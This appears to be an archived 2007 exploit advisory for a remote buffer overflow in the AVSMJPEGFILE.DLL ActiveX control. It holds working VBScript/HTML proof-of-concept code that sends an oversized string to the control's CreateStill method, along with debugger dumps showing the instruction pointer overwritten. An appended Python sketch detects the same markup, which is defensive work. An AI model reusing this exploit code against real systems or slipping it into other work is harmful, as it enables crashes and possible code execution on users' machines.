
omt-bofpoc.txt

Posted Dec 12, 2007
Authored by shinnai | Site shinnai.altervista.org

Online Media Technologies remote buffer overflow proof of concept exploit that makes use of AVSMJPEGFILE.DLL version 1.1.

tags | exploit, remote, overflow, proof of concept
SHA-256 | 5cfbac8e931aab99da7b1eb11acc7fad023c22bedd2abc2435e4d9c4c8f55299

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-------------------------------------------------------------------------------
<b>Online Media Technologies AVSMJPEGFILE.DLL 1.1 Remote Buffer Overflow</b>
url: www.avsmedia.com

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

<b><font color='red'>This was written for educational purposes. Use it at your own risk.
The author will not be responsible for any damage.</font></b>

<b>Technical details:
File: AVSMJPEGFILE.DLL
Ver.: 1.1.1.102</b>

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
<b>Remote execution depends on Internet Explorer settings</b>

faultmon dump:
09:58:13.236 pid=13E4 tid=145C EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION writing [41414141])
----------------------------------------------------------------
EAX=02A31C64: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
EBX=00001C4A: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=00001448: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ESP=0188C9A4: A0 3F 9B 02 41 41 41 41-41 41 41 41 41 41 41 41
EBP=0188EE08: 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
ESI=00000A25: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=029B3FA0: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
EIP=02BF3604: 89 01 E8 0F D6 03 00 83-C4 04 33 C0 8D A5 EC F7
--> MOV [ECX],EAX
----------------------------------------------------------------

09:58:13.252 pid=13E4 tid=145C EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [41414141])
----------------------------------------------------------------
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=7C9137D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
ESP=0188C5D4: BF 37 91 7C BC C6 88 01-80 F2 88 01 D8 C6 88 01
EBP=0188C5F4: A4 C6 88 01 8B 37 91 7C-BC C6 88 01 80 F2 88 01
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
--> N/A
----------------------------------------------------------------
-------------------------------------------------------------------------------
<object classid='clsid:4CF945DB-7D52-437B-AD30-185336B44C74' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
Sub tryMe
buff = String(3620, "A")
test.CreateStill buff, 1, True
End Sub
</script>
</span></span>
</code></pre>
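
A detection sketch for the markup above, added here as an example and not part of the original advisory: it scans HTML for an `<object>` tag that instantiates the CLSID from the PoC, ties the tag's `id` to calls of `CreateStill`, and reports large `String(n, c)` fills. The `LONG_FILL` threshold, the function names and the benign sample are assumptions made for illustration.

```python
import re

# CLSID and method name come from the PoC on this page.
VULN_CLSID = "4CF945DB-7D52-437B-AD30-185336B44C74"
VULN_METHOD = "CreateStill"
LONG_FILL = 1024  # assumption: threshold for a suspicious String(n, c) fill

OBJECT_RE = re.compile(r"<object\b[^>]*>", re.I)
ATTR_RE = re.compile(
    r"""\b(classid|id)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))""", re.I)
FILL_RE = re.compile(r"\bString\s*\(\s*(\d+)\s*,", re.I)

# Markup and script lines as they appear in the PoC above.
SAMPLE_POC = """
<object classid='clsid:4CF945DB-7D52-437B-AD30-185336B44C74' id='test'></object>
<script language='vbscript'>
Sub tryMe
buff = String(3620, "A")
test.CreateStill buff, 1, True
End Sub
</script>
"""
# Constructed benign page: a made-up CLSID and a short fill.
SAMPLE_BENIGN = """
<object classid="clsid:00000000-0000-0000-0000-000000000001" id="player"></object>
<script language="vbscript">pad = String(8, "-")</script>
"""

def object_ids(html, clsid=VULN_CLSID):
    """Return the id attribute of each <object> tag that instantiates clsid."""
    ids = []
    for tag in OBJECT_RE.findall(html):
        attrs = {m.group(1).lower(): m.group(2) or m.group(3) or m.group(4) or ""
                 for m in ATTR_RE.finditer(tag)}
        value = attrs.get("classid", "").lower()
        if value.startswith("clsid:") and value[6:].strip("{} ") == clsid.lower():
            ids.append(attrs.get("id", ""))
    return ids

def scan(html):
    """Report use of the control, calls to the method, and long string fills."""
    ids = object_ids(html)
    calls = []
    for obj_id in filter(None, ids):
        pat = re.compile(r"\b%s\s*\.\s*%s\b" % (re.escape(obj_id), VULN_METHOD), re.I)
        calls += [obj_id] * len(pat.findall(html))
    fills = [int(n) for n in FILL_RE.findall(html) if int(n) >= LONG_FILL]
    return {"control_loaded": bool(ids), "method_calls": calls, "long_fills": fills}
```

A `control_loaded` hit is worth alerting on by itself, because the method call and the fill can be assembled at run time where these patterns will not see them.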
